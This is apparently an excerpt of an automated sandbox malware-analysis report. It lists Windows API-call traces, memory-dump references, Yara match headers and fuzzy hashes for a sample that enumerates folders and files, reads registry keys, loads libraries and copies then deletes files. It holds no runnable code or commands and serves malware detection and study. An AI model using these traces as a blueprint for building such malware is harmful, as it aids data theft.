                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1175201934-0
                                                                                                                                                                                                                                              • Opcode ID: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
                                                                                                                                                                                                                                              • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086790), ref: 0041244B
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04066698), ref: 004124B7
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086EB8), ref: 004124DF
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                                                                                                                              • Opcode ID: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
                                                                                                                                                                                                                                              • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                              • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                              • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C20C947
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C20C969
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C20C9A9
                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C20C9C8
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C20C9E2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716177431.000000006C1F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 6C1F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716123546.000000006C1F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716499748.000000006C27E000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716526775.000000006C282000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c1f0000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4191843772-0
                                                                                                                                                                                                                                              • Opcode ID: 4a349bf811791671993b2cba4947ee45dd4d51a6f0a86ee2941d7d0ac9c7e9c1
                                                                                                                                                                                                                                              • Instruction ID: ad63e7c6acfe7e3d6f3504f690f4a436c7ce87dc198da4d38c54f38ed3b2c044
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a349bf811791671993b2cba4947ee45dd4d51a6f0a86ee2941d7d0ac9c7e9c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6321C87174562C6BDB05AA24C8C8BBE7279AB46B04F50052AFD03A7A80DB605840C7B2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04083A28), ref: 004129EB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                              • String ID: L0A
                                                                                                                                                                                                                                              • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                                              • Opcode ID: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
                                                                                                                                                                                                                                              • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                              • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                              • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,04067288,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,04086D38,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                              • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                              • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,040673D8,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,040863D0,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                              • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                              • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(040837F8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04086F98,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(040837F8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                              • API String ID: 2929475105-2812842227
                                                                                                                                                                                                                                              • Opcode ID: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
                                                                                                                                                                                                                                              • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                              • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                              • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                              • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                              • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
